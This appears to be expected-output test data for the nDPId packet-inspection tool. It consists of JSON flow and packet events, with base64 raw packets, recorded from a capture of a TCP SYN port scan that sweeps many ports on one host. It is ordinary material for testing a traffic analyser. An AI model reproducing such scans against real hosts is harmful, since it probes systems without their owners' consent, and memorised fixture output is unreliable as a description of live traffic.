-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsKsAAAC0G8LKsEAAIQA2GNIzThwzdU4MZAAAAAGACCACpfwAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAstssAADcGWqesEAAIQA2GNIzTA3jdU4MZAAAAAGACEAAlFAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZkAACgGstmsEAAIQA2GNIzTIAjdU4MZAAAAAGACBAAUhAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs9XgAADsGF\/qsEAAIQA2GNIzTB\/\/dU4MZAAAAAGACEAAgjQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsbSgAADkGokqsEAAIQA2GNIzTC7bdU4MZAAAAAGACCAAk1gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsGhwAADYG+FasEAAIQA2GNIzTgAbdU4MZAAAAAGACDACshQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs9osAADAGIeesEAAIQA2GNIzTBB3dU4MZAAAAAGACBAAwbwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs+cAAADsGE7KsEAAIQA2GNIzTHCHdU4MZAAAAAGACEAAMawAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsIVwAADQG8xasEAAIQA2GNIzTF9rdU4MZAAAAAGACBAAcsgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAszS8AACYGVUOsEAAIQA2GNIzTI1rdU4MZAAAAAGACDAAJMgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsE4oAACwGCOmsEAAIQA2GNIzTEPfdU4MZAAAAAGACBAAjlQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAscS4AADIGpUSsEAAIQA2GNIzTH0ndU4MZAAAAAGACDAANQwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsB1sAACgGGRisEAAIQA2GNIzTBR3dU4MZAAAAAGACBAAvbwAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsAs8AADoGC6SsEAAIQA2GNIzTAFPdU4MZAAAAAGACDAAsOQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBUAACkG612sEAAIQA2GNIzT1DjdU4MZAAAAAGACCABcUwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ5MAADsGpd+sEAAIQA2GNIzTEWHdU4MZAAAAAGACEAAXKwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAs964AAC8GIcSsEAAIQA2GNIzTG1ndU4MZAAAAAGACEAANMwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsC84AAC0GD6WsEAAIQA2GNIzTJ8TdU4MZAAAAAGACCAAIyAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsHuYAADAG+YysEAAIQA2GNIzTDwvdU4MZAAAAAGACBAAlgQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsD7cAADgGALysEAAIQA2GNIzTG7zdU4MZAAAAAGACBAAY0AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAspxIAAC0GdGCsEAAIQA2GNIzSBMLdUoMYAAAAAGACCAArzQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsBn4AACYGG\/WsEAAIQA2GNIzSS3PdUoMYAAAAAGACDADhGwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAs43YAACwGOPysEAAIQA2GNIzSTYLdUoMYAAAAAGACBADnDAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsg1oAAC4GlxisEAAIQA2GNIzSDdrdUoMYAAAAAGACDAAetQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 